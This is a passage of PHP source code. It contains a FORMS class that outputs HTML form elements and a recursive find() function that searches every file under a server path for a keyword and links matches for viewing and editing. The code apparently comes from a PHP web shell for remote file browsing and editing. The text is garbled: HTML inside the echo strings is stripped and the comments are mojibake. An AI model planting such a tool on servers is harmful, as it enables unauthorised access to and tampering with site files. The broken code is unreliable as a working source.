} } mysql_free_result($rows); } class FORMS { function tableheader() { echo "\n"; } function headerform($arg=array()) { global $dir; if ($arg[enctype]){ $enctype="enctype=\"$arg[enctype]\""; } else { $enctype=""; } if (!isset($arg[method])) { $arg[method] = "POST"; } if (!isset($arg[action])) { $arg[action] = ''; } echo " \n"; echo " \n"; echo " \n"; echo " \n"; echo " \n"; } function tdheader($title) { global $dir; echo " \n"; echo " \n"; echo " \n"; } function tdbody($content,$align='center',$bgcolor='2',$height='',$extra='',$colspan='') { if ($bgcolor=='2') { $css="secondalt"; } elseif ($bgcolor=='1') { $css="firstalt"; } else { $css=$bgcolor; } $height = empty($height) ? "" : " height=".$height; $colspan = empty($colspan) ? "" : " colspan=".$colspan; echo " \n"; echo " \n"; echo " \n"; } function tablefooter() { echo "
".$arg[content]."
".$title." []
".$content."
\n"; } function formheader($action='',$title,$target='') { global $dir; $target = empty($target) ? "" : " target=\"".$target."\""; echo "
\n"; echo " \n"; echo " ".$title." []\n"; echo " \n"; } function makehidden($name,$value=''){ echo "\n"; } function makeinput($name,$value='',$extra='',$type='text',$size='30',$css='input'){ $css = ($css == 'input') ? " class=\"input\"" : ""; $input = "\n"; return $input; } function maketextarea($name,$content='',$cols='100',$rows='20',$extra=''){ $textarea = "\n"; return $textarea; } function formfooter($over='',$height=''){ $height = empty($height) ? "" : " height=\"".$height."\""; echo " \n"; echo " \n"; echo " \n"; echo "
\n"; echo $end = empty($over) ? "" : "\n"; } function makeselect($arg = array()){ if ($arg[multiple]==1) { $multiple = " multiple"; if ($arg[size]>0) { $size = "size=$arg[size]"; } } if ($arg[css]==0) { $css = "class=\"input\""; } $select = "\n"; return $select; } } function find($path) //ҹؼ { global $oldkey,$type,$type2,$endline,$beline; if(is_dir("$path")){ $tempdir=opendir("$path"); while($f=readdir($tempdir)){ if($f=="."||$f=="..")continue; find("$path/$f");} closedir($tempdir); }else{ if(filesize("$path")){ $fp=fopen("$path","r"); $msg=fread($fp, filesize("$path")); fclose($fp); if(strpos($msg, $oldkey) !== false) { $dir = dirname($path); $file = basename($path); if($type=="list"){ $mymsg = explode("\n",$msg); $long = count($mymsg); $tmp = explode($oldkey,$msg); $tmp = explode("\n",$tmp[0]); $first = count($tmp); $end = "[".$first."/".$long."]"; } if($type2=="getpath"){ $get = explode($oldkey,$msg); $get = strlen($get[0]); if(isset($beline)){ $get = $get-$beline; } $getpath = htmlspecialchars(substr($msg, $get, $endline)); $getpath = "title = \"".$getpath."\""; } echo "ҵ:$dir/$file |view+edit | $end
"; } } } }?>